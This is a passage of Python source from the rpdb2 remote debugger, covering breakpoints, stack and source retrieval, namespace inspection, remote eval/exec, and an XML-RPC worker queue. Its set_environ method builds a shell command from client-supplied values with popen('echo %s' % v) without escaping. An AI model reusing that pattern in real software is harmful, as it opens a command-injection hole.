if (tid >= 0) and (tid < 100):
_tid = list(self.m_threads.keys())[tid]
else:
_tid = tid
ctx = self.m_threads[_tid]
except (IndexError, KeyError):
raise ThreadNotFound
self.m_current_ctx = ctx
self.m_lastest_event = ctx.m_event
finally:
self.m_state_manager.release()
self.send_events(None)
class CDebuggerEngine(CDebuggerCore):
"""
Main class for the debugger.
Adds functionality on top of CDebuggerCore.
"""
def __init__(self, fembedded = False):
CDebuggerCore.__init__(self, fembedded)
event_type_dict = {
CEventState: {},
CEventStackDepth: {},
CEventBreakpoint: {},
CEventThreads: {},
CEventNoThreads: {},
CEventThreadBroken: {},
CEventNamespace: {},
CEventUnhandledException: {},
CEventStack: {},
CEventNull: {},
CEventExit: {},
CEventForkSwitch: {},
CEventExecSwitch: {},
CEventSynchronicity: {},
CEventTrap: {},
CEventForkMode: {},
CEventPsycoWarning: {},
CEventConflictingModules: {},
CEventSignalIntercepted: {},
CEventSignalException: {},
CEventClearSourceCache: {},
CEventEmbeddedSync: {}
}
self.m_event_queue = CEventQueue(self.m_event_dispatcher)
self.m_event_queue.register_event_types(event_type_dict)
event_type_dict = {CEventSync: {}}
self.m_event_dispatcher.register_callback(self.send_events, event_type_dict, fSingleUse = False)
def shutdown(self):
self.m_event_queue.shutdown()
CDebuggerCore.shutdown(self)
def sync_with_events(self, fException, fSendUnhandled):
"""
Send debugger state to client.
"""
if len(self.m_threads) == 0:
self.wait_for_first_thread()
index = self.m_event_queue.get_event_index()
event = CEventSync(fException, fSendUnhandled)
self.m_event_dispatcher.fire_event(event)
return index
def trap_conflicting_modules(self):
modules_list = []
for m in CONFLICTING_MODULES:
if m in g_found_conflicting_modules:
continue
if not m in sys.modules:
continue
if m == 'psyco':
#
# Old event kept for compatibility.
#
event = CEventPsycoWarning()
self.m_event_dispatcher.fire_event(event)
g_found_conflicting_modules.append(m)
modules_list.append(as_unicode(m))
if modules_list == []:
return False
event = CEventConflictingModules(modules_list)
self.m_event_dispatcher.fire_event(event)
return True
def wait_for_event(self, timeout, event_index):
"""
Wait for new events and return them as list of events.
"""
self.cancel_request_go_timer()
self.trap_conflicting_modules()
(new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
if self.trap_conflicting_modules():
(new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
return (new_event_index, sel)
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
print_debug('Setting breakpoint to: %s, %s, %d' % (repr(filename), scope, lineno))
assert(is_unicode(filename))
assert(is_unicode(scope))
assert(is_unicode(expr))
fLock = False
try:
if filename in [None, '']:
self.m_state_manager.acquire()
fLock = True
self.verify_broken()
_filename = self.get_current_filename(frame_index, fException)
elif not is_provider_filesystem(filename):
_filename = as_string(filename, sys.getfilesystemencoding())
else:
_filename = FindFile(filename, fModules = True)
if expr != '':
try:
encoding = self.__calc_encoding(encoding, filename = _filename)
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
compile(_expr, '<string>', 'eval')
except:
raise SyntaxError
encoding = as_unicode(encoding)
bp = self.m_bp_manager.set_breakpoint(_filename, scope, lineno, fEnabled, expr, encoding)
self.set_all_tracers()
event = CEventBreakpoint(bp)
#print_debug(repr(vars(bp)))
self.m_event_dispatcher.fire_event(event)
finally:
if fLock:
self.m_state_manager.release()
def disable_breakpoint(self, id_list, fAll):
self.m_bp_manager.disable_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.DISABLE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def enable_breakpoint(self, id_list, fAll):
self.m_bp_manager.enable_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.ENABLE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def delete_breakpoint(self, id_list, fAll):
self.m_bp_manager.delete_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.REMOVE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def get_breakpoints(self):
"""
return id->breakpoint dictionary.
"""
bpl = self.m_bp_manager.get_breakpoints()
_items = [(id, breakpoint_copy(bp)) for (id, bp) in bpl.items()]
for (id, bp) in _items:
bp.m_code = None
_bpl = dict(_items)
return _bpl
def send_events(self, event):
"""
Send series of events that define the debugger state.
"""
if isinstance(event, CEventSync):
fException = event.m_fException
fSendUnhandled = event.m_fSendUnhandled
else:
fException = False
fSendUnhandled = False
try:
if isinstance(event, CEventSync) and not fException:
self.m_state_manager.set_state()
self.send_stack_depth()
self.send_threads_event(fException)
self.send_stack_event(fException)
self.send_namespace_event()
if fSendUnhandled and self.m_fUnhandledException:
self.send_unhandled_exception_event()
except NoThreads:
self.send_no_threads_event()
except:
print_debug_exception()
raise
def send_unhandled_exception_event(self):
event = CEventUnhandledException()
self.m_event_dispatcher.fire_event(event)
def send_stack_depth(self):
"""
Send event with stack depth and exception stack depth.
"""
f = None
tb = None
ctx = self.get_current_ctx()
try:
try:
f = ctx.frame_acquire()
except ThreadDone:
return
s = my_extract_stack(f)
s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
stack_depth = len(s)
tb = get_traceback(f, ctx)
if tb == None:
stack_depth_exception = None
else:
s = my_extract_stack(tb.tb_frame.f_back)
s += my_extract_tb(tb)
s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
stack_depth_exception = len(s)
event = CEventStackDepth(stack_depth, stack_depth_exception)
self.m_event_dispatcher.fire_event(event)
finally:
f = None
tb = None
ctx.frame_release()
def send_threads_event(self, fException):
"""
Send event with current thread list.
In case of exception, send only the current thread.
"""
tl = self.get_thread_list()
if fException:
ctid = tl[0]
itl = tl[1]
_itl = [a for a in itl if a[DICT_KEY_TID] == ctid]
_tl = (ctid, _itl)
else:
_tl = tl
event = CEventThreads(*_tl)
self.m_event_dispatcher.fire_event(event)
def send_stack_event(self, fException):
sl = self.get_stack([], False, fException)
if len(sl) == 0:
return
event = CEventStack(sl[0])
self.m_event_dispatcher.fire_event(event)
def send_namespace_event(self):
"""
Send event notifying namespace should be queried again.
"""
event = CEventNamespace()
self.m_event_dispatcher.fire_event(event)
def send_no_threads_event(self):
_event = CEventNoThreads()
self.m_event_dispatcher.fire_event(_event)
def send_event_null(self):
"""
Make the event waiter return.
"""
event = CEventNull()
self.m_event_dispatcher.fire_event(event)
def __get_stack(self, ctx, ctid, fException):
tid = ctx.m_thread_id
f = None
_f = None
tb = None
_tb = None
try:
try:
f = ctx.frame_acquire()
except ThreadDone:
return None
if fException:
tb = get_traceback(f, ctx)
if tb == None:
raise NoExceptionFound
_tb = tb
while _tb.tb_next is not None:
_tb = _tb.tb_next
_f = _tb.tb_frame
s = my_extract_stack(tb.tb_frame.f_back)
s += my_extract_tb(tb)
else:
_f = f
s = my_extract_stack(f)
code_list = []
while _f is not None:
rc = repr(_f.f_code).split(',')[0].split()[-1]
rc = as_unicode(rc)
code_list.insert(0, rc)
_f = _f.f_back
finally:
f = None
_f = None
tb = None
_tb = None
ctx.frame_release()
#print code_list
__s = [(a, b, c, d) for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
if (ctx.m_uef_lineno is not None) and (len(__s) > 0):
(a, b, c, d) = __s[0]
__s = [(a, ctx.m_uef_lineno, c, d)] + __s[1:]
r = {}
r[DICT_KEY_STACK] = __s
r[DICT_KEY_CODE_LIST] = code_list
r[DICT_KEY_TID] = tid
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_EVENT] = as_unicode([ctx.m_event, 'exception'][fException])
if tid == ctid:
r[DICT_KEY_CURRENT_TID] = True
return r
def get_stack(self, tid_list, fAll, fException):
if fException and (fAll or (len(tid_list) != 0)):
raise BadArgument
ctx = self.get_current_ctx()
ctid = ctx.m_thread_id
if fAll:
ctx_list = list(self.get_threads().values())
elif fException or (len(tid_list) == 0):
ctx_list = [ctx]
else:
ctx_list = [self.get_threads().get(t, None) for t in tid_list]
_sl = [self.__get_stack(ctx, ctid, fException) for ctx in ctx_list if ctx is not None]
sl = [s for s in _sl if s is not None]
return sl
def get_source_file(self, filename, lineno, nlines, frame_index, fException):
assert(is_unicode(filename))
if lineno < 1:
lineno = 1
nlines = -1
_lineno = lineno
r = {}
frame_filename = None
try:
ctx = self.get_current_ctx()
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
frame_filename = calc_frame_path(f)
finally:
f = None
base_frame = None
ctx.frame_release()
frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]
except NoThreads:
if filename in [None, '']:
raise
if filename in [None, '']:
__filename = frame_filename
r[DICT_KEY_TID] = ctx.m_thread_id
elif not is_provider_filesystem(filename):
__filename = as_string(filename, sys.getfilesystemencoding())
else:
__filename = FindFile(filename, fModules = True)
if not IsPythonSourceFile(__filename):
raise NotPythonSource
_filename = winlower(__filename)
lines = []
breakpoints = {}
fhide_pwd_mode = False
while nlines != 0:
try:
g_traceback_lock.acquire()
line = get_source_line(_filename, _lineno)
finally:
g_traceback_lock.release()
if line == '':
break
#
# Remove any trace of session password from data structures that
# go over the network.
#
if fhide_pwd_mode:
if not ')' in line:
line = as_unicode('...\n')
else:
line = '...""")' + line.split(')', 1)[1]
fhide_pwd_mode = False
elif 'start_embedded_debugger(' in line:
ls = line.split('start_embedded_debugger(', 1)
line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'
if ')' in ls[1]:
line += '""")' + ls[1].split(')', 1)[1]
else:
line += '\n'
fhide_pwd_mode = True
lines.append(line)
try:
bp = self.m_bp_manager.get_breakpoint(_filename, _lineno)
breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
except KeyError:
pass
_lineno += 1
nlines -= 1
if frame_filename == _filename:
r[DICT_KEY_FRAME_LINENO] = frame_lineno
r[DICT_KEY_EVENT] = as_unicode(frame_event)
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_LINES] = lines
r[DICT_KEY_FILENAME] = as_unicode(_filename, sys.getfilesystemencoding())
r[DICT_KEY_BREAKPOINTS] = breakpoints
r[DICT_KEY_FIRST_LINENO] = lineno
return r
def __get_source(self, ctx, nlines, frame_index, fException):
tid = ctx.m_thread_id
_frame_index = [0, frame_index][tid == self.m_current_ctx.m_thread_id]
try:
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, _frame_index, fException)
frame_filename = calc_frame_path(f)
except (ThreadDone, InvalidFrame):
return None
finally:
f = None
base_frame = None
ctx.frame_release()
frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]
first_line = max(1, frame_lineno - nlines // 2)
_lineno = first_line
lines = []
breakpoints = {}
fhide_pwd_mode = False
while nlines != 0:
try:
g_traceback_lock.acquire()
line = get_source_line(frame_filename, _lineno)
finally:
g_traceback_lock.release()
if line == '':
break
#
# Remove any trace of session password from data structures that
# go over the network.
#
if fhide_pwd_mode:
if not ')' in line:
line = as_unicode('...\n')
else:
line = '...""")' + line.split(')', 1)[1]
fhide_pwd_mode = False
elif 'start_embedded_debugger(' in line:
ls = line.split('start_embedded_debugger(', 1)
line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'
if ')' in ls[1]:
line += '""")' + ls[1].split(')', 1)[1]
else:
line += '\n'
fhide_pwd_mode = True
lines.append(line)
try:
bp = self.m_bp_manager.get_breakpoint(frame_filename, _lineno)
breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
except KeyError:
pass
_lineno += 1
nlines -= 1
r = {}
r[DICT_KEY_FRAME_LINENO] = frame_lineno
r[DICT_KEY_EVENT] = as_unicode(frame_event)
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_TID] = tid
r[DICT_KEY_LINES] = lines
r[DICT_KEY_FILENAME] = as_unicode(frame_filename, sys.getfilesystemencoding())
r[DICT_KEY_BREAKPOINTS] = breakpoints
r[DICT_KEY_FIRST_LINENO] = first_line
return r
def get_source_lines(self, nlines, fAll, frame_index, fException):
if fException and fAll:
raise BadArgument
if fAll:
ctx_list = list(self.get_threads().values())
else:
ctx = self.get_current_ctx()
ctx_list = [ctx]
_sl = [self.__get_source(ctx, nlines, frame_index, fException) for ctx in ctx_list]
sl = [s for s in _sl if s is not None]
return sl
def __get_locals_globals(self, frame_index, fException, fReadOnly = False):
ctx = self.get_current_ctx()
(_globals, _locals, _original_locals_copy) = ctx.get_locals_copy(frame_index, fException, fReadOnly)
return (_globals, _locals, _original_locals_copy)
def __calc_number_of_subnodes(self, r):
for t in [bytearray, bytes, str, str8, unicode, int, long, float, bool, type(None)]:
if t is type(r):
return 0
try:
try:
if isinstance(r, frozenset) or isinstance(r, set):
return len(r)
except NameError:
pass
if isinstance(r, sets.BaseSet):
return len(r)
if isinstance(r, dict):
return len(r)
if isinstance(r, list):
return len(r)
if isinstance(r, tuple):
return len(r)
return len(dir(r))
except AttributeError:
return 0
return 0
def __calc_subnodes(self, expr, r, fForceNames, filter_level, repr_limit, encoding):
snl = []
try:
if isinstance(r, frozenset) or isinstance(r, set):
if len(r) > MAX_SORTABLE_LENGTH:
g = r
else:
g = [i for i in r]
sort(g)
for i in g:
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e = {}
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '"')))
e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)
snl.append(e)
return snl
except NameError:
pass
if isinstance(r, sets.BaseSet):
if len(r) > MAX_SORTABLE_LENGTH:
g = r
else:
g = [i for i in r]
sort(g)
for i in g:
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e = {}
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '"')))
e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)
snl.append(e)
return snl
if isinstance(r, list) or isinstance(r, tuple):
for i, v in enumerate(r[0: MAX_NAMESPACE_ITEMS]):
is_valid = [True]
e = {}
e[DICT_KEY_EXPR] = as_unicode('(%s)[%d]' % (expr, i))
e[DICT_KEY_NAME] = as_unicode(repr(i))
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
if len(r) > MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
return snl
if isinstance(r, dict):
if filter_level == 2 and expr in ['locals()', 'globals()']:
r = copy.copy(r)
for k, v in list(r.items()):
if parse_type(type(v)) in ['function', 'classobj', 'type']:
del r[k]
if len(r) > MAX_SORTABLE_LENGTH:
kl = r
else:
kl = list(r.keys())
sort(kl)
for k in kl:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if k in ['_RPDB2_FindRepr', '_RPDB2_builtins', '_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
v = r[k]
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
e = {}
if [True for t in [bool, int, float, bytes, str, unicode, type(None)] if t is type(k)]:
rk = repr(k)
if len(rk) < REPR_ID_LENGTH:
e[DICT_KEY_EXPR] = as_unicode('(%s)[%s]' % (expr, rk))
if type(k) is str8:
rk = repr(k)
if len(rk) < REPR_ID_LENGTH:
e[DICT_KEY_EXPR] = as_unicode('(%s)[str8(%s)]' % (expr, rk[1:]))
if not DICT_KEY_EXPR in e:
rk = repr_ltd(k, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '"')))
e[DICT_KEY_NAME] = as_unicode([repr_ltd(k, repr_limit, encoding), k][fForceNames])
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
return snl
al = calc_attribute_list(r, filter_level)
sort(al)
for a in al:
if a == 'm_rpdb2_pwd':
continue
try:
v = getattr(r, a)
except AttributeError:
continue
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
e = {}
e[DICT_KEY_EXPR] = as_unicode('(%s).%s' % (expr, a))
e[DICT_KEY_NAME] = as_unicode(a)
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
return snl
def get_exception(self, frame_index, fException):
ctx = self.get_current_ctx()
if is_py3k():
exc_info = ctx.get_exc_info()
if exc_info == None:
return {'type': None, 'value': None, 'traceback': None}
type, value, traceback = exc_info
e = {'type': type, 'value': value, 'traceback': traceback}
return e
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
e = {'type': f.f_exc_type, 'value': f.f_exc_value, 'traceback': f.f_exc_traceback}
return e
finally:
f = None
base_frame = None
ctx.frame_release()
def is_child_of_failure(self, failed_expr_list, expr):
for failed_expr in failed_expr_list:
if expr.startswith(failed_expr):
return True
return False
def calc_expr(self, expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding):
e = {}
try:
__globals = _globals
__locals = _locals
if RPDB_EXEC_INFO in expr:
rpdb_exception_info = self.get_exception(frame_index, fException)
__globals = globals()
__locals = locals()
__locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr
is_valid = [True]
r = eval(expr, __globals, __locals)
e[DICT_KEY_EXPR] = as_unicode(expr)
e[DICT_KEY_REPR] = repr_ltd(r, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(r)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(r)
if fExpand and (e[DICT_KEY_N_SUBNODES] > 0):
fForceNames = (expr in ['globals()', 'locals()']) or (RPDB_EXEC_INFO in expr)
e[DICT_KEY_SUBNODES] = self.__calc_subnodes(expr, r, fForceNames, filter_level, repr_limit, encoding)
e[DICT_KEY_N_SUBNODES] = len(e[DICT_KEY_SUBNODES])
except:
print_debug_exception()
e[DICT_KEY_ERROR] = as_unicode(safe_repr(sys.exc_info()))
lock.acquire()
if len(rl) == index:
rl.append(e)
lock.release()
event.set()
def __calc_encoding(self, encoding, fvalidate = False, filename = None):
if encoding != ENCODING_AUTO and not fvalidate:
return encoding
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
return encoding
except:
pass
if filename == None:
ctx = self.get_current_ctx()
filename = ctx.m_code_context.m_filename
try:
encoding = get_file_encoding(filename)
return encoding
except:
return 'utf-8'
def get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
if fraw:
encoding = ENCODING_RAW_I
else:
encoding = self.__calc_encoding(encoding, fvalidate = True)
try:
(_globals, _locals, x) = self.__get_locals_globals(frame_index, fException, fReadOnly = True)
except:
print_debug_exception()
raise
failed_expr_list = []
rl = []
index = 0
lock = threading.Condition()
for (expr, fExpand) in nl:
if self.is_child_of_failure(failed_expr_list, expr):
continue
event = threading.Event()
args = (expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding)
if self.m_fsynchronicity:
g_server.m_work_queue.post_work_item(target = self.calc_expr, args = args, name = 'calc_expr %s' % expr)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 0, self.calc_expr, *args)
except:
pass
safe_wait(event, 2)
lock.acquire()
if len(rl) == index:
rl.append('error')
failed_expr_list.append(expr)
index += 1
lock.release()
if len(failed_expr_list) > 3:
break
_rl = [r for r in rl if r != 'error']
return _rl
def evaluate(self, expr, frame_index, fException, encoding, fraw):
"""
Evaluate expression in context of frame at depth 'frame-index'.
"""
result = [(as_unicode(''), as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]
if self.m_fsynchronicity:
self._evaluate(result, expr, frame_index, fException, encoding, fraw)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 1000, self._evaluate, result, expr, frame_index, fException, encoding, fraw)
except:
pass
return result[-1]
def _evaluate(self, result, expr, frame_index, fException, encoding, fraw):
"""
Evaluate expression in context of frame at depth 'frame-index'.
"""
encoding = self.__calc_encoding(encoding)
(_globals, _locals, x) = self.__get_locals_globals(frame_index, fException)
v = ''
w = ''
e = ''
try:
if '_rpdb2_pwd' in expr or '_rpdb2_args' in expr:
r = '...Removed-password-from-output...'
else:
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding, fstrict = True)
if '_RPDB2_builtins' in expr:
_locals['_RPDB2_builtins'] = vars(g_builtins_module)
try:
redirect_exc_info = True
r = eval(_expr, _globals, _locals)
finally:
del redirect_exc_info
if '_RPDB2_builtins' in expr:
del _locals['_RPDB2_builtins']
if fraw:
encoding = ENCODING_RAW_I
v = repr_ltd(r, MAX_EVALUATE_LENGTH, encoding)
if len(v) > MAX_EVALUATE_LENGTH:
v += '... *** %s ***' % STR_MAX_EVALUATE_LENGTH_WARNING
w = STR_MAX_EVALUATE_LENGTH_WARNING
except:
exc_info = sys.exc_info()
e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))
self.notify_namespace()
result.append((as_unicode(v), as_unicode(w), as_unicode(e)))
def execute(self, suite, frame_index, fException, encoding):
"""
Execute suite (Python statement) in context of frame at
depth 'frame-index'.
"""
result = [(as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]
if self.m_fsynchronicity:
self._execute(result, suite, frame_index, fException, encoding)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 1000, self._execute, result, suite, frame_index, fException, encoding)
except:
pass
return result[-1]
def _execute(self, result, suite, frame_index, fException, encoding):
"""
Execute suite (Python statement) in context of frame at
depth 'frame-index'.
"""
print_debug('exec called with: ' + repr(suite))
encoding = self.__calc_encoding(encoding)
(_globals, _locals, _original_locals_copy) = self.__get_locals_globals(frame_index, fException)
if frame_index > 0 and not _globals is _locals:
_locals_copy = copy.copy(_locals)
w = ''
e = ''
try:
if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
_locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr
try:
_suite = as_bytes(ENCODING_SOURCE % encoding + suite, encoding, fstrict = True)
#print_debug('suite is %s' % repr(_suite))
_code = compile(_suite, '<string>', 'exec')
try:
redirect_exc_info = True
exec(_code, _globals, _locals)
finally:
del redirect_exc_info
finally:
if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
del _locals['_RPDB2_FindRepr']
except:
exc_info = sys.exc_info()
e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))
if frame_index > 0 and (not _globals is _locals) and _locals != _locals_copy:
l = [(k, safe_repr(v)) for k, v in _locals.items()]
sl = set(l)
lc = [(k, safe_repr(v)) for k, v in _locals_copy.items()]
slc = set(lc)
nsc = [k for (k, v) in sl - slc if k in _original_locals_copy]
if len(nsc) != 0:
w = STR_LOCAL_NAMESPACE_WARNING
self.notify_namespace()
result.append((as_unicode(w), as_unicode(e)))
def __decode_thread_name(self, name):
name = as_unicode(name)
return name
def get_thread_list(self):
"""
Return thread list with tid, state, and last event of each thread.
"""
ctx = self.get_current_ctx()
if ctx is None:
current_thread_id = -1
else:
current_thread_id = ctx.m_thread_id
ctx_list = list(self.get_threads().values())
tl = []
for c in ctx_list:
d = {}
d[DICT_KEY_TID] = c.m_thread_id
d[DICT_KEY_NAME] = self.__decode_thread_name(c.m_thread_name)
d[DICT_KEY_BROKEN] = c.m_fBroken
d[DICT_KEY_EVENT] = as_unicode(c.m_event)
tl.append(d)
return (current_thread_id, tl)
def stop_debuggee(self):
"""
Notify the client and terminate this proccess.
"""
g_server.m_work_queue.post_work_item(target = _atexit, args = (True, ), name = '_atexit')
def set_synchronicity(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
event = CEventSynchronicity(fsynchronicity)
self.m_event_dispatcher.fire_event(event)
if self.m_state_manager.get_state() == STATE_BROKEN:
self.notify_namespace()
def set_trap_unhandled_exceptions(self, ftrap):
self.m_ftrap = ftrap
event = CEventTrap(ftrap)
self.m_event_dispatcher.fire_event(event)
def is_unhandled_exception(self):
return self.m_fUnhandledException
def set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
event = CEventForkMode(ffork_into_child, ffork_auto)
self.m_event_dispatcher.fire_event(event)
def set_environ(self, envmap):
global g_fignorefork
print_debug('Entered set_environ() with envmap = %s' % repr(envmap))
if len(envmap) == 0:
return
old_pythonpath = os.environ.get('PYTHONPATH', '')
encoding = detect_locale()
for k, v in envmap:
try:
k = as_string(k, encoding, fstrict = True)
v = as_string(v, encoding, fstrict = True)
except:
continue
command = 'echo %s' % v
try:
g_fignorefork = True
f = platform.popen(command)
finally:
g_fignorefork = False
value = f.read()
f.close()
if value[-1:] == '\n':
value = value[:-1]
os.environ[k] = value
if 'PYTHONPATH' in [k for (k, v) in envmap]:
recalc_sys_path(old_pythonpath)
#
# ------------------------------------- RPC Server --------------------------------------------
#
class CWorkQueue:
"""
Worker threads pool mechanism for RPC server.
"""
def __init__(self, size = N_WORK_QUEUE_THREADS):
self.m_lock = threading.Condition()
self.m_work_items = []
self.m_f_shutdown = False
self.m_size = size
self.m_n_threads = 0
self.m_n_available = 0
self.__create_thread()
def __create_thread(self):
t = CThread(name = '__worker_target', target = self.__worker_target, shutdown = self.shutdown)
#thread_set_daemon(t, True)
t.start()
def shutdown(self):
"""
Signal worker threads to exit, and wait until they do.
"""
if self.m_f_shutdown:
return
print_debug('Shutting down worker queue...')
self.m_lock.acquire()
self.m_f_shutdown = True
lock_notify_all(self.m_lock)
t0 = time.time()
while self.m_n_threads > 0:
if time.time() - t0 > SHUTDOWN_TIMEOUT:
self.m_lock.release()
print_debug('Shut down of worker queue has TIMED OUT!')
return
safe_wait(self.m_lock, 0.1)
self.m_lock.release()
print_debug('Shutting down worker queue, done.')
def __worker_target(self):
try:
self.m_lock.acquire()
self.m_n_threads += 1
self.m_n_available += 1
fcreate_thread = not self.m_f_shutdown and self.m_n_threads < self.m_size
self.m_lock.release()
if fcreate_thread:
self.__create_thread()
self.m_lock.acquire()
while not self.m_f_shutdown:
safe_wait(self.m_lock)
if self.m_f_shutdown:
break
if len(self.m_work_items) == 0:
continue
fcreate_thread = self.m_n_available == 1
(target, args, name) = self.m_work_items.pop()
self.m_n_available -= 1
self.m_lock.release()
if fcreate_thread:
print_debug('Creating an extra worker thread.')
self.__create_thread()
thread_set_name(current_thread(), '__worker_target - ' + name)
try:
target(*args)
except:
print_debug_exception()
thread_set_name(current_thread(), '__worker_target')
self.m_lock.acquire()
self.m_n_available += 1
if self.m_n_available > self.m_size:
break
self.m_n_threads -= 1
self.m_n_available -= 1
lock_notify_all(self.m_lock)
finally:
self.m_lock.release()
def post_work_item(self, target, args, name = ''):
if self.m_f_shutdown:
return
try:
self.m_lock.acquire()
if self.m_f_shutdown:
return
self.m_work_items.append((target, args, name))
self.m_lock.notify()
finally:
self.m_lock.release()
#
# MOD
#
class CUnTracedThreadingMixIn(SocketServer.ThreadingMixIn):
"""
Modification of SocketServer.ThreadingMixIn that uses a worker thread
queue instead of spawning threads to process requests.
This mod was needed to resolve deadlocks that were generated in some
circumstances.
"""
def process_request(self, request, client_address):
g_server.m_work_queue.post_work_item(target = SocketServer.ThreadingMixIn.process_request_thread, args = (self, request, client_address), name = 'process_request')
#
# MOD
#
def my_xmlrpclib_loads(data):
"""
Modification of Python 2.3 xmlrpclib.loads() that does not do an
import. Needed to prevent deadlocks.
"""
p, u = xmlrpclib.getparser()
p.feed(data)
p.close()
return u.close(), u.getmethodname()
#
# MOD
#
class CXMLRPCServer(CUnTracedThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer):
if os.name == POSIX:
allow_reuse_address = True
else:
allow_reuse_address = False
"""
